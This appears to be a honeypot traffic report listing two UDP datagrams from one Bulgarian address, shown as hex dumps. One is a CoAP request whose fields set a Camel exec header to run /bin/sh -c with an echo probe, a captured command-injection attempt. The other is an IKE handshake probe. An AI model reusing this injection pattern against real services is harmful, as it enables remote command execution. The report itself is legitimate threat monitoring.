UDP traffic
Datagrams matching asn:48090 sent to HoneyLabs sensors over UDP in the last 24 hours. DNS questions and QUIC client fingerprints are decoded on the sensor. Other datagrams are kept as their first bytes and labelled by protocol where it can be recognised.
A UDP source address can be forged, so each address listed here either sent the traffic or was impersonated by whoever did. UDP traffic is kept out of verdicts, feeds, watchlists and alerts.
2
Datagrams
1
Source addresses
1
Networks
1
Countries
2
Destination ports
Traffic by type
Service queries
1 datagrams from 1 sourceRequests a service answers without a handshake. Scanners send them to find open DNS, NTP, SNMP or SSDP servers, which are also the servers reflection attacks abuse.
Latest CoAP datagram, to 5683/udp
payload bytes
00000000 44 02 b2 26 63 c0 e1 1d b4 65 78 65 63 11 00 3d |D..&c....exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 61 |ho CVE202633453a| 00000060 6c 62 69 69 73 72 74 27 ff 70 72 6f 62 65 |lbiisrt'.probe|
Unrecognised
1 datagrams from 1 sourceDatagrams no decoder recognised. Their first bytes are kept.
Latest Unrecognised datagram, to 500/udp
payload bytes
00000000 d7 15 cc 4a 91 7d 53 3b 00 00 00 00 00 00 00 00 |...J.}S;........| 00000010 01 10 02 00 00 00 00 00 00 00 00 64 0d 00 00 30 |...........d...0| 00000020 00 00 00 01 00 00 00 01 00 00 00 24 01 01 00 01 |...........$....| 00000030 00 00 00 1c 01 01 00 00 80 01 00 07 80 0e 01 00 |................| 00000040 80 02 00 02 80 03 00 03 80 04 00 02 00 00 00 18 |................| 00000050 3c f1 87 b2 47 40 29 ea 46 ac 7f d0 ea f2 89 f5 |<...G@).F.......| 00000060 00 00 00 04 |....|
Source addresses (unverified)
| Address | Network | Cc | Sends | Datagrams | Last seen (UTC) |
|---|---|---|---|---|---|
| 93.123.109.214 | AS48090 Techoff Srv Limited | BG | Unrecognised | 2 | 2026-10-10 18:23 |
Latest datagrams
payload bytes
00000000 44 02 b2 26 63 c0 e1 1d b4 65 78 65 63 11 00 3d |D..&c....exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 61 |ho CVE202633453a| 00000060 6c 62 69 69 73 72 74 27 ff 70 72 6f 62 65 |lbiisrt'.probe|
payload bytes
00000000 d7 15 cc 4a 91 7d 53 3b 00 00 00 00 00 00 00 00 |...J.}S;........| 00000010 01 10 02 00 00 00 00 00 00 00 00 64 0d 00 00 30 |...........d...0| 00000020 00 00 00 01 00 00 00 01 00 00 00 24 01 01 00 01 |...........$....| 00000030 00 00 00 1c 01 01 00 00 80 01 00 07 80 0e 01 00 |................| 00000040 80 02 00 02 80 03 00 03 80 04 00 02 00 00 00 18 |................| 00000050 3c f1 87 b2 47 40 29 ea 46 ac 7f d0 ea f2 89 f5 |<...G@).F.......| 00000060 00 00 00 04 |....|